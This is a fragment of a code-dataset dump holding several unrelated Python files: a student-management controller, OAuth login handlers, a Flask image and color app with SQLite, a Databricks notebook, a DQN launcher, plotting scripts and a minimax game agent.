MentorView.get_new_value('login')\n            elif value_to_change == '2':\n                student.name = MentorView.get_new_value('name')\n            elif value_to_change == '3':\n                student.password = MentorView.get_new_value('password')\n            elif value_to_change == '4':\n                additional_days = MentorView.get_additional_attendance()\n                student.attendance += int(additional_days)\n                MentorView.show_invalid_input()\n            elif value_to_change == '5':\n                groups = GroupContainer.get_instance().get_groups_list()\n                if not groups:\n                    MentorView.display_not_enough_data()\n                    return\n                group_index = MentorView.get_group_index(groups)\n                group_index = int(group_index)\n                GroupContainer.get_instance().add_student_to_group(groups[group_index].name, student)\n                UserContainer.get_instance().save_users_to_file()\n            elif value_to_change == '6':\n                return\n            else:\n                MentorView.show_invalid_input()\n\n    def promote_user_to_student(self):\n        \"\"\"\n        Assignes user to students list\n\n        :return: None\n        \"\"\"\n        not_assigned_users = UserContainer.get_instance().get_not_assigned_users_list()\n        user_index = MentorView.get_user_index(not_assigned_users)\n        user_index = int(user_index)\n        user_to_assign = not_assigned_users[user_index]\n        name = user_to_assign.name\n        login = user_to_assign.login\n        password = user_to_assign.password\n        phone_number = user_to_assign.phone_number\n        email = user_to_assign.email\n        UserContainer.get_instance().remove_user(user_to_assign)\n        if not user_to_assign:\n            return\n        user_to_assign = Student(name, login, password, phone_number, email)\n        UserContainer.get_instance().add_user(user_to_assign)\n\n    def edit_groups(self, create_new=True):\n        \"\"\"\n        Creates or edits group\n\n        :param create_new: bool -> Decides if method will create new or edit existing group\n        :return: None\n        \"\"\"\n        if create_new:\n            new_group_name = MentorView.get_group_name()\n            group = Group(new_group_name)\n            GroupContainer.get_instance().add_group(group.name)\n        else:\n            groups_list = GroupContainer.get_instance().get_groups_list()\n            group_index = int(MentorView.get_group_index(groups_list))\n            new_group_name = MentorView.get_group_name()\n            for group in groups_list:\n                if group.name == new_group_name:\n                    raise AttributeError\n            groups_list[group_index].name = new_group_name\n\n\n\n","sub_path":"controllers/mentor_controller.py","file_name":"mentor_controller.py","file_ext":"py","file_size_in_byte":8011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"428047357","text":"# -*- coding: utf-8 -*-\n\nfrom lastuserapp import db\nimport lastuser_core.models as models\nfrom .test_db import TestDatabaseFixture\n\n\nclass TestClient(TestDatabaseFixture):\n    def setUp(self):\n        super(TestClient, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n\n\nclass TestUserClientPermissions(TestDatabaseFixture):\n    def setUp(self):\n        super(TestUserClientPermissions, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        # Add permission to the client\n        client = models.Client.query.filter_by(user=self.user).first()\n        self.permission = models.UserClientPermissions(user=self.user, client=client)\n        self.permission.permissions = u\"admin\"\n        db.session.add(self.permission)\n        db.session.commit()\n\n\nclass TestTeamClientPermissions(TestDatabaseFixture):\n    def setUp(self):\n        super(TestTeamClientPermissions, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.team = models.Team(userid=self.user.userid, title=u\"developers\", org=self.org)\n        db.session.add(self.team)\n        self.team_client_permission = models.TeamClientPermissions(team=self.team, client=self.client, access_permissions=u\"admin\")\n        db.session.add(self.team_client_permission)\n        db.session.commit()\n\n\nclass TestResource(TestDatabaseFixture):\n    def setUp(self):\n        super(TestResource, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        resource = models.Resource(name=u\"resource\", title=u\"Resource\", client=self.client)\n        db.session.add(resource)\n        db.session.commit()\n\n    def test_find_all(self):\n        resources = self.client.resources\n        self.assertEqual(len(resources), 2)\n        self.assertEqual(set([r.name for r in resources]), set([u'test_resource', u'resource']))\n\n\nclass TestClientTeamAccess(TestDatabaseFixture):\n    def setUp(self):\n        super(TestClientTeamAccess, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.client.team_access = True\n        db.session.commit()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.team = models.Team(userid=self.user.userid, title=u\"developers\", org=self.org)\n        db.session.add(self.team)\n        self.team_client_permission = models.TeamClientPermissions(team=self.team, client=self.client, access_permissions=u\"admin\")\n        db.session.add(self.team_client_permission)\n        self.client_team_access = models.ClientTeamAccess(org=self.org, client=self.client, access_level=models.CLIENT_TEAM_ACCESS.ALL)\n        db.session.add(self.client_team_access)\n        db.session.commit()\n\n    def test_find_all(self):\n        self.assertIs(self.client.org_team_access[0], self.client_team_access)\n\n\nclass TestPermission(TestDatabaseFixture):\n    def setUp(self):\n        super(TestPermission, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.permission = models.Permission(user=self.user, org=self.org, name=u\"admin\", title=u\"admin\", allusers=True)\n        db.session.add(self.permission)\n        db.session.commit()\n","sub_path":"tests/test_model_client.py","file_name":"test_model_client.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"587073124","text":"# -*- coding: utf-8 -*-\n# Copyright 2016 Mobicage NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.1@@\nimport httplib\nimport os\nimport urllib\nimport uuid\n\nimport webapp2\n\nfrom auth import login_user, logout_user, get_current_user_id\nfrom handlers import render_error_page, render_page\nfrom mcfw.exceptions import HttpException\nfrom plugin_loader import get_config\nfrom plugins.its_you_online_auth.bizz.authentication import get_user_scopes\nfrom plugins.its_you_online_auth.bizz.settings import get_organization\nfrom plugins.its_you_online_auth.exceptions.organizations import OrganizationNotFoundException\nfrom plugins.its_you_online_auth.models import OauthLoginState\nfrom plugins.its_you_online_auth.plugin_consts import OAUTH_BASE_URL, NAMESPACE, SOURCE_WEB, SOURCE_APP\nfrom plugins.its_you_online_auth.plugin_utils import get_sub_organization\nfrom utils import now\n\n\nclass SigninHandler(webapp2.RequestHandler):\n    def get(self):\n        user_id = get_current_user_id()\n        if user_id:\n            self.redirect('/')\n            return\n\n        render_page(self.response, os.path.join('unauthenticated', 'signin.html'), plugin_name=NAMESPACE)\n\n\nclass LogoutHandler(webapp2.RequestHandler):\n    def get(self):\n        user_id = get_current_user_id()\n        if user_id:\n            logout_user(self.response)\n        self.redirect('/')\n\n\nclass AppLoginHandler(webapp2.RequestHandler):\n    def get(self):\n        params = dict()\n        params['source'] = 'app'\n        self.redirect('/login/organization?%s' % urllib.urlencode(params))\n\n\nclass PickOrganizationHandler(webapp2.RequestHandler):\n    def get(self):\n        organization_id = self.request.GET.get('organization_id', None)\n        source = self.request.GET.get('source', SOURCE_WEB)\n\n        error = None\n        if organization_id:\n            config = get_config(NAMESPACE)\n            if organization_id != config.root_organization.name:\n                try:\n                    get_organization(organization_id)\n                except OrganizationNotFoundException as e:\n                    error = e.message\n\n            if not error:\n                params = dict()\n                params['source'] = source\n                params['organization_id'] = organization_id\n                self.redirect('/login/redirect?%s' % urllib.urlencode(params))\n                return\n\n        template_dict = dict(source=self.request.GET.get('source', SOURCE_WEB),\n                             error=error)\n\n        render_page(self.response, os.path.join('unauthenticated', 'organization.html'), plugin_name=NAMESPACE,\n                    template_dict=template_dict)\n\n\nclass DoLoginHandler(webapp2.RequestHandler):\n    def get(self):\n        organization_id = self.request.GET.get('organization_id', None)\n        source = self.request.GET.get('source', SOURCE_WEB)\n\n        if not organization_id:\n            self.redirect('/login/organization')\n            return\n\n        config = get_config(NAMESPACE)\n        if organization_id != config.root_organization.name:\n            try:\n                get_organization(organization_id)\n            except OrganizationNotFoundException as e:\n                render_error_page(self.response, httplib.BAD_REQUEST, e.message)\n                return\n\n        if source not in [SOURCE_WEB, SOURCE_APP]:\n            render_error_page(self.response, httplib.BAD_REQUEST, 'Bad Request')\n            return\n\n        if organization_id == config.root_organization.name:\n            if source == SOURCE_APP:\n                render_error_page(self.response, httplib.BAD_REQUEST, 'Bad Request')\n                return\n            else:\n                sub_org = organization_id\n        else:\n            sub_org = get_sub_organization(config, organization_id)\n\n        params = {\n            'response_type': 'code',\n            'client_id': config.root_organization.name,\n            'redirect_uri': config.root_organization[source].redirect_uri,\n            'scope': 'user:memberof:%s' % sub_org,\n            'state': str(uuid.uuid4())\n        }\n\n        login_state = OauthLoginState(key=OauthLoginState.create_key(params['state']))\n        login_state.timestamp = now()\n        login_state.organization_id = organization_id\n        login_state.source = source\n        login_state.completed = False\n        login_state.put()\n\n        oauth_url = '%s/authorize?%s' % (OAUTH_BASE_URL, urllib.urlencode(params))\n        self.redirect(oauth_url)\n\n\nclass Oauth2CallbackHandler(webapp2.RequestHandler):\n    def get(self):\n        # should only be used by source web\n        code = self.request.GET.get('code', None)\n        state = self.request.GET.get('state', None)\n        try:\n            username, scopes = get_user_scopes(code, state)\n        except HttpException as e:\n            render_error_page(self.response, e.http_code, e.error)\n            return\n\n        login_user(self.response, username, scopes)\n        self.redirect('/')\n","sub_path":"plugins/its_you_online_auth/handlers/unauthenticated.py","file_name":"unauthenticated.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"82366864","text":"import os\nfrom _curses import flash\n\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory, session\nfrom werkzeug.utils import secure_filename\nimport sqlite3 as sql\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_FOLDER = os.path.join(APP_ROOT, 'userUploads/')\n\nprint('upload', UPLOAD_FOLDER)\nALLOWED_EXTENSIONS = set(['jpg', 'txt'])\n\nprint('hdere: ', UPLOAD_FOLDER)\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.secret_key = \"super secret key\"\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/colorpicker')\ndef hello_world():\n    if 'name' in request.args:\n        name = request.args.get('name');\n        newPath = '/static/images/' + name;\n        session['path'] = newPath\n\n    path = session['path']\n    print('path: ', path)\n    return render_template('colorpicker.html', filename=path)\n\n@app.route('/word', methods=['GET', 'POST'])\ndef word():\n    if request.method == 'POST':\n        word = request.form['word']\n        session['word'] = word\n        return redirect('/uploadPhoto')\n    return render_template('wordselect.html')\n\n\n# @app.route('/wordPick', methods=['POST'])\n# def wordPick():\n#     word = request.form['word']\n#     return render_template('wordselect.html', word=word)\n\n@app.route('/uploadPhoto', methods=['GET', 'POST'])\ndef uploadPhoto():\n    if request.method == 'POST':\n        # check if the post request has the file part\n        if 'file' not in request.files:\n            flash('No file part')\n            return redirect(request.url)\n        file = request.files['file']\n        print('requests: ', request.files['file'])\n        # if user does not select file, browser also\n        # submit a empty part without filename\n        if file.filename == '':\n            flash('No selected file')\n            return redirect(request.url)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            print('path: ', os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            session['photo'] = filename\n            session['path'] = '../uploads/' + filename\n            return redirect('/colorpicker')\n            # return redirect(url_for('uploadPhoto',\n            #                         filename=filename))\n\n    images = os.listdir(os.path.join(app.static_folder, \"images\"))\n\n    return render_template('pickFile.html', images=images)\n\n@app.route('/wordcolor')\ndef wordColor():\n    print(request.args)\n    print(request.query_string)\n    val1 = '#' + request.args.get('val1')\n    print(val1)\n    val2 = '#' + request.args.get('val2')\n    val3 = '#' + request.args.get('val3')\n    val4 = '#' + request.args.get('val4')\n    val5 = '#' + request.args.get('val5')\n    session['val1'] = val1;\n    session['val2'] = val2;\n    session['val3'] = val3;\n    session['val4'] = val4;\n    session['val5'] = val5;\n\n\n    colors = [val1, val2, val3, val4, val5]\n    print(colors)\n    word = session['word']\n    return render_template('wordcolor.html', colors=colors, word=word)\n\n\n@app.route('/show/')\ndef uploaded_file(filename):\n    filename = '../uploads/' + filename\n    session['path'] = filename\n    print(filename)\n    images = os.listdir(os.path.join(app.static_folder, \"images\"))\n    print(images)\n    return render_template('pickFile.html', filename=filename, images=images)\n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/uploads//')\ndef send_file(filename):\n    return send_from_directory(UPLOAD_FOLDER, filename)\n\n@app.route('/final')\ndef final():\n    color = request.args.get('color')\n    word = session['word']\n    path = session['path']\n    session['color'] = color\n\n    return render_template(\"final.html\", word=word, path=path, color=color)\n\n@app.route('/list')\ndef list():\n    BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n    db_path = os.path.join(BASE_DIR, \"new_file\")\n    con = sql.connect(db_path)\n\n\n    print('connection: ', con)\n\n\n    con.row_factory = sql.Row\n\n    cur = con.cursor()\n    cur.execute(\"select * from information\")\n\n\n    rows = cur.fetchall();\n    print('rows', rows)\n\n    return render_template(\"userPhoto.html\", rows=rows)\n\n@app.route('/submit')\ndef submit():\n    word = session['word']\n    path = session['path']\n    val1 = session['val1']\n    val2 = session['val2']\n    val3 = session['val3']\n    val4 = session['val4']\n    val5 = session['val5']\n    color = session['color']\n\n\n    BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n    db_path = os.path.join(BASE_DIR, \"new_file\")\n    # con = sql.connect(db_path)\n\n    try:\n\n        with sql.connect(db_path) as con:\n            cur = con.cursor()\n            cur.execute(\"INSERT INTO information (photopath, word, hexColor, val1, val2, val3, val4, val5) VALUES(?, ?, ?, ?, ?, ?, ?, ?)\",\n                        (path, word, color, val1, val2, val3, val4, val5))\n            con.commit()\n            msg = \"Record successfully added\"\n            print(msg)\n    except:\n        con.rollback()\n        msg = \"error in insert operation\"\n        print(msg)\n\n    finally:\n        return redirect('/list')\n        con.close()\n\n\nif __name__ == '__main__':\n    app.run()\n","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"267304827","text":"\"\"\"\n Run gpnids and send the result back to stdout\n\"\"\"\n\nimport sys\nimport os\nimport tempfile\nimport subprocess\n\n\nos.putenv(\"GEMTBL\", \"/home/ldm/pyWWA/gempak/tables\")\nos.putenv(\"GEMERR\", \"/home/ldm/pyWWA/gempak/error\")\nos.putenv(\"GEMPDF\", \"/home/ldm/pyWWA/gempak/pdf\")\n\ndef write_data():\n    \"\"\"\n    Do the GEMPAK workflow!\n    \"\"\"\n    tmpfn = tempfile.mktemp().lower()\n    o = open(\"%s.ncr\" % (tmpfn,), 'wb')\n    o.write( sys.stdin.read() )\n    o.close()\n    return tmpfn\n\ndef do_gempak(tmpfn):\n    \"\"\"\n    Do the GEMPAK workflow\n    \"\"\"\n    cmd = \"\"\"  RADFIL   = %s.ncr\n RADTIM   =\n TITLE    = 1\n PANEL    = 0\n DEVICE   = GIF|%s.gif\n CLEAR    = YES\n TEXT     = 1\n COLORS   = 1\n WIND     = \n LINE     = 3\n CLRBAR   =\n IMCBAR   =\n GAREA    = DSET\n MAP      = 1/1/2\n LATLON   =\n OUTPUT   = f/%s.out\n list\n run\n\n exit\n\"\"\" % (tmpfn, tmpfn, tmpfn)\n    p = subprocess.Popen(\"/home/ldm/bin/gpnids_vg\",\n                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n                         stderr=subprocess.PIPE)\n    p.communicate(cmd)\n    #(so, se) = p.communicate(cmd)\n    #p.stdin.write(cmd)\n    #se = p.stderr.read()\n    #so = p.stdout.read()\n    #time.sleep(3)\n    #l.write( se )\n    #l.write(so)\n    for suffix in ['gif','ncr']:\n        if os.path.isfile('%s.%s' % (tmpfn,suffix)):\n            os.unlink(\"%s.%s\" % (tmpfn,suffix))\n\ndef main():\n    \"\"\"\n    Actually do work!\n    \"\"\"\n    tmpfn = write_data()\n    do_gempak(tmpfn)\n    fn = \"%s.out\" % (tmpfn,)\n    if os.path.isfile(fn):\n        sys.stdout.write( open(fn).read() )\n        os.unlink(fn)\n    \nif __name__ == '__main__':\n    main()\n\n\n","sub_path":"ncr2postgis.py","file_name":"ncr2postgis.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"71166079","text":"# Databricks notebook source\n# Mount Azure storage\nMOUNTPOINT = \"/mnt/weatherstorage\"\nCONTAINER = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"container-name\")\nSTORAGE = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"storage-account-name\")\nSAS = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"databricks-accesstoken\")\nURI = \"fs.azure.sas.{container}.{storage}.blob.core.windows.net\".format(container=CONTAINER, storage=STORAGE)\n\ntry:\n  dbutils.fs.mount(\n    source = \"wasbs://{container}@{storage}.blob.core.windows.net\".format(container=CONTAINER, storage=STORAGE), \n    mount_point = MOUNTPOINT,\n    extra_configs = {URI:SAS})\nexcept Exception as e:\n  if \"Directory already mounted\" in str(e):\n    print(\"Mount already exists\")\n    pass\n  else:\n    raise e\n\n# COMMAND ----------\n\n# Load electric yearly coonsumption from an Excel file retrieved manually from the electric company\nfrom pyspark.sql.functions import *\n\nelDf = (spark.read.format(\"com.crealytics.spark.excel\")\n.option(\"header\", \"true\")\n.option(\"treatEmptyValuesAsNulls\", \"false\")\n.option(\"inferSchema\", \"true\")\n.option(\"addColorColumns\", \"false\")\n.load(\"/mnt/weatherstorage/electric-usage.xlsx\"))\nelDf = elDf.where(\"Tila <> 'Puuttuva'\").withColumn(\"DateHour\", date_format(to_timestamp(concat(col(\"Päivämäärä\"), lit(\" \"), col(\"Tunti\")), \"d.M.yyyy H:mm\"), \"yyyy-MM-dd HH\"))\ndisplay(elDf)\n\n# COMMAND ----------\n\n# Load the temperature data and group it by each hour calculating the average\ntemperDf = spark.read.format(\"json\").load(\"/mnt/weatherstorage/weatherdata.json\")\ntemperDf = temperDf.withColumn(\"DateHour\", date_format(to_timestamp(col(\"datetime\")), \"yyyy-MM-dd HH\")).groupBy(\"DateHour\").agg(avg(\"temperature\").alias(\"Temperature\"))\ndisplay(temperDf)\n\n# COMMAND ----------\n\n# Join the earlier fetched temperature data to the electric usage data\nfrom pyspark.sql import *\n# Ugly way of joining:\n#    combDf = temperDf.join(elDf, temperDf[\"DateHour\"] == elDf[\"DateHour\"]).select(temperDf[\"DateHour\"], \"Temperature\", \"kWh\")\n# SQL way:\ntemperDf.registerTempTable(\"temper\")\nelDf.registerTempTable(\"elusage\")\ncombDf = sqlContext.sql(\"\"\"SELECT elusage.DateHour, temper.Temperature, elusage.kWh FROM temper RIGHT OUTER JOIN elusage ON temper.DateHour == elusage.DateHour\"\"\")\n\ndisplay(combDf)","sub_path":"DataBricks/electricdata.py","file_name":"electricdata.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"2363275","text":"n,m = map(int,input().split())\n\nboard = [[10001]*n for _ in range(n)]\n\nfor _ in range(m):\n    a,b = map(int,input().split())\n    board[a-1][b-1] = 1\n    board[b-1][a-1] = 1\n\nfor i in range(n):\n    board[i][i] = 0\nminny = 10001\nfor k in range(n):\n    for x in range(n):\n        for y in range(n):\n            if board[x][k] <10000 and board[k][y] < 10000:\n                board[x][y] = min(board[x][y], board[x][k]+board[k][y])\n\nanswer = 0\nfor i,b in enumerate(board):\n    if minny > sum(b):\n        answer = i+1\n        minny = sum(b)\nprint(answer)\n","sub_path":"1389 케빈 베이컨의 6단계 법칙.py","file_name":"1389 케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"571307216","text":"#\n# Call it this way :\n# python launcher.py --name Angela --mode train --episodes 100 --epsilon 0.95 --epsilon_decay 0.98 --batch_size 8\n# python launcher.py --name Angela --mode test --load Angela___445.00max__181.50avg___65.00min__1613079598.model\n\n# Train a previous model\n# python launcher.py --name Angela --mode train --load Angela___380.00max__178.50avg___40.00min__1613082541.model --episodes 100 --epsilon 0.95 --epsilon_decay 0.98 --batch_size 8\n\n# tensorboard --logs_dir=D:\\AI\\AI_Framework\\tradingBot_DQN_v1\\logs\n#\nimport sys,os\nimport argparse\nimport time\nimport numpy as np \n\nimport gym\n\n# our code\nfrom DQNAgent import DQNAgent\nfrom Magician import Magician\n\n#\n# Command line arguments\n#\nparser = argparse.ArgumentParser(description=\"Train and test different networks on Space Invaders\")\n\n# Parse arguments\n# parser.add_argument(\"-n\", \"--network\", type=str, action='store', help=\"Please specify the network you wish to use, either DQN or DDQN\", required=True)\nparser.add_argument(\"-n\", \"--name\", type=str, action='store', help=\"Please specify the name of your AI model (bob, louis, estelle...)\", required=True)\nparser.add_argument(\"-m\", \"--mode\", type=str, action='store', help=\"Please specify the mode you wish to run, either train or test\", required=True)\nparser.add_argument(\"-l\", \"--load\", type=str, action='store', help=\"Please specify the file you wish to load weights from(for example saved.h5)\", required=False)\nparser.add_argument(\"-e\", \"--episodes\", type=str, action='store', help=\"Number of episodes to run\", required=False)\nparser.add_argument(\"-epsilon\", \"--epsilon\", type=str, action='store', help=\"Epsilon (from 0.0 to 1.0)\", required=False)\nparser.add_argument(\"-ed\", \"--epsilon_decay\", type=str, action='store', help=\"Epsilon Decay (from 0.0 to 1.0)\", required=False)\nparser.add_argument(\"-b\", \"--batch_size\", type=str, action='store', help=\"Number of steps to train the model at each step of the game\", required=False)\n# parser.add_argument(\"-s\", \"--save\", type=str, action='store', help=\"Specify folder to render simulation of network in\", required=False)\n# parser.add_argument(\"-x\", \"--statistics\", action='store_true', help=\"Specify to calculate statistics of network(such as average score on game)\", required=False)\n# parser.add_argument(\"-v\", \"--view\", action='store_true', help=\"Display the network playing a game of space-invaders. Is overriden by the -s command\", required=False)\nargs = parser.parse_args()\nprint(args)\n\n#\n# Create the environment (Game, Trading, whatever...)\n#\n\nenvironment = gym.make('SpaceInvaders-v0')\n#environment = gym.make(\"MountainCar-v0\")\n\n#\n# Create or load a trainer\n#\n#if args.load:\n    # load here a new trainer model\n#else:\n\n# Give the trainer the size of the environment and the number of possible actions\n\n#\n# observation_space : API\n#\n# observation_space.low / observation_space.high / observation_space.shape\n# observation_space.sample() / observation_space.contains()\n\nobs_space_high = environment.observation_space.high\nobs_space_low = environment.observation_space.low\n\n#print(\" observation_space : \" + str(environment.observation_space))\n#print(\" High : \" + str(environment.observation_space.high))\n#print(\" Low : \" + str(environment.observation_space.low))\n#print(\" Shape : \" + str(environment.observation_space.shape))\n\n#\n# Create the Agent\n#\nmyDQNAgent = DQNAgent(name=args.name)\n\n    \n\n\n#\n# Test the choosen model\n#\nif args.mode == \"test\":\n\n    myDQNAgent = DQNAgent(name=args.name)\n\n    magician = Magician(agent=myDQNAgent, env=environment)\n\n    magician.test(model_to_load=args.load)\n\n#\n# Train the choosen model\n#\nif args.mode == \"train\":\n\n    myDQNAgent.set_parameters(environment.observation_space.shape, environment.env.action_space.n, batch_size=int(args.batch_size), learning_rate=0.001,)\n\n    if not args.load:\n        myDQNAgent.prepare_new_model();\n    else:\n        myDQNAgent.load_model(args.load)\n        \n    #\n    # Create the Magician who deals with the Trainer and the Environment\n    #\n    magician = Magician(agent=myDQNAgent, env=environment, epsilon=float(args.epsilon), epsilon_decay=float(args.epsilon_decay), epsilon_mini=0.001)\n\n    # train the agent\n    magician.doMagic(nb_episodes=int(args.episodes))\n\n\n\n","sub_path":"tradingBot_DQN_v1/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"351504002","text":"'''\nhttps://matplotlib.org/3.1.0/tutorials/colors/colormaps.html.\n'''\n\nimport datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndataset = pd.read_csv('https://storage.googleapis.com/dqlab-dataset/retail_raw_reduced.csv')\ndataset['order_month'] = dataset['order_date'].apply(lambda x: datetime.datetime.strptime(x, \"%Y-%m-%d\").strftime('%Y-%m'))\ndataset['gmv'] = dataset['item_price']*dataset['quantity']\n\nplt.clf()\ndataset.groupby(['order_month', 'province'])['gmv'].sum().unstack().plot(cmap='Set1')\nplt.title('Monthly GMV Year 2019 - Breakdown by Province', loc='center', pad=30, fontsize=20, color='blue')\nplt.xlabel('Order Month', fontsize = 15)\nplt.ylabel('Total Amount (in Billions)', fontsize = 15)\nplt.grid(color='darkgray', linestyle=':', linewidth=0.5)\nplt.ylim(ymin=0)\nlabels, locations = plt.yticks()\nplt.yticks(labels, (labels/1000000000).astype(int))\nplt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.5), shadow=True, ncol=3, title='Province', fontsize=9, title_fontsize=11)\nplt.gcf().set_size_inches(10, 5)\nplt.tight_layout()\nplt.show()","sub_path":"05 Data Visualization with Python Matplotlib for Beginner/Part 2/09 kustomisasi colormap.py","file_name":"09 kustomisasi colormap.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"597407495","text":"from math import inf\r\nimport copy\r\n\r\nclass MinimaxAlphaBetaAgent():\r\n\r\n\tdef __init__(self):\r\n\t\treturn\r\n\t\r\n\tdef staticEval(self, state):\r\n\t\treturn state.score\r\n\r\n\tdef minimax_alpha_beta(self, state, depth, alpha, beta, isMax):\r\n\t\tif state.gameOver() or depth is 0:\r\n\t\t\treturn -1, state.score() - depth\r\n\t\tif isMax:\r\n\t\t\tbestValue = -1, -inf\r\n\t\telse:\r\n\t\t\tbestValue = -1, inf\r\n\r\n\t\tfor s in self.get_all_next_moves(state):\r\n\t\t\tplayer = 'X' if isMax else 'O'\r\n\t\t\tstate.move(player, s)\r\n\t\t\tvalue = s, self.minimax_alpha_beta(state, depth - 1, alpha, beta, not isMax)[1]\r\n\t\t\tstate.undo_move(player, s)\r\n\t\t\tif isMax:\r\n\t\t\t\tbestValue = max(bestValue, value, key= lambda i: i[1])\r\n\t\t\t\talpha = max(alpha, bestValue[1])\r\n\t\t\t\tif alpha >= beta:\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\t#return s, alpha\r\n\t\t\telse:\r\n\t\t\t\tbestValue = min(bestValue, value, key= lambda i: i[1])\r\n\t\t\t\tbeta = min(beta, value[1])\r\n\t\t\t\tif alpha >= beta:\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\t#return s, beta\r\n\t\treturn bestValue\r\n\r\n\tdef choose(self, state, player):\r\n\t\treturn self.minimax_alpha_beta(state, len(self.get_all_next_moves(state)), -inf, inf, player)\r\n\r\n\tdef get_all_next_moves(self, state):\r\n\t\tmoves = []\r\n\t\tfor row in state.empty_tiles():\r\n\t\t\tfor tile in row:\r\n\t\t\t\tmoves.append(tile)\r\n\t\treturn moves\r\n","sub_path":"Resources/code/minimaxAlphaBetaAgent.py","file_name":"minimaxAlphaBetaAgent.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"378868178","text":"\n#####################################################################\n### Assignment skeleton\n### You can alter the below code to make your own dynamic website.\n### The landing page for assignment 3 should be at /\n#####################################################################\n\nfrom bottle import route, run, default_app, debug\n\ndef htmlify(title,text):\n    page = \"\"\"\n        \n        \n            \n                \n                %s\n            \n            \n            %s\n            \n        \n\n    \"\"\" % (title,text)\n    return page\n\ndef index():\n    return htmlify()\n    \ndef kobe():\n\treturn htmlify()\n\n\nroute('/index.html', 'GET', index)\nroute('/Kobe_Bryant.html', 'GET', kobe)\n\n#####################################################################\n### Don't alter the below code.\n### It allows this website to be hosted on Heroku\n### OR run on your computer.\n#####################################################################\n\n# This line makes bottle give nicer error messages\ndebug(True)\n# This line is necessary for running on Heroku\napp = default_app()\n# The below code is necessary for running this bottle app standalone on your computer.\nif __name__ == \"__main__\":\n  run()\n\n","sub_path":"Web_app2/bottle_app.py","file_name":"bottle_app.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
